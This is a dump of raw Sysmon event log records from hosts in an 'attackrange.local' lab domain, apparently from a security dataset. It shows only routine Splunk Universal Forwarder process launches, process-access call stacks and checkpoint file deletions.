10341000x80000000000000001055055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.603{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.603{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.603{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.603{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.603{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F893-60EB-027E-00000000CF01}6792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.587{466BC892-F893-60EB-027E-00000000CF01}6792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.586{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=693B8637CA3A353CB06FA4035AEBB6A5,SHA256=4C08286EE2B7D116B016AD740AD765B618B515F50B60B7D72EF632A06D9284CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810584Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:51.454{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6F21ADC6DC945B62D8C30ACECD8B03E,SHA256=9B8534332D6B2C445620BC450CF8470E4824635D981765A2AD0D88CA6EBFD895,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.217{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A567713657AF0B0A919EC06108EDA5D,SHA256=792332DE3602134B0BB7FA27FE724EE2A27CD0E9E44AE03BAE553D30EE5F6F13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:51.217{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=13E395662AC38D5F2BBFF4052E6F5637,SHA256=873B58CF9BFF2A380641A50CD4C1F3B0A4700F6606E382B6319D4D27BB41BF5F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.987{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F894-60EB-047E-00000000CF01}8412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.969{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.969{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.969{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.969{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.969{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F894-60EB-047E-00000000CF01}8412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.969{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F894-60EB-047E-00000000CF01}8412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.970{466BC892-F894-60EB-047E-00000000CF01}8412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.623{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29C8587E45DF70F844B95097A2FD9874,SHA256=3CF05329A7C28862D241117FEF9DD4D8A67525DDF6DC6DC70DEEEF8B55052DFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.607{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A567713657AF0B0A919EC06108EDA5D,SHA256=792332DE3602134B0BB7FA27FE724EE2A27CD0E9E44AE03BAE553D30EE5F6F13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810585Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:52.516{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B0897710F547C037EC6A6CC187BCC54,SHA256=D6455F6FBA3143E1079528C816CA79A4E1791B27580B9A552399C253DCF04F82,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.290{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F894-60EB-037E-00000000CF01}8604C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.290{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.290{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.290{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.290{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.290{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F894-60EB-037E-00000000CF01}8604C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.290{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F894-60EB-037E-00000000CF01}8604C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.285{466BC892-F894-60EB-037E-00000000CF01}8604C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001055091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.970{466BC892-F895-60EB-057E-00000000CF01}42529372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.970{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B8E3E851C2F4B9B9A7217B49404019E1,SHA256=07CF0D12A2D73A08C297CF25B5A12B19A9D416F1295C265ADDE950B3056AE922,IMPHASH=00000000000000000000000000000000falsetrue 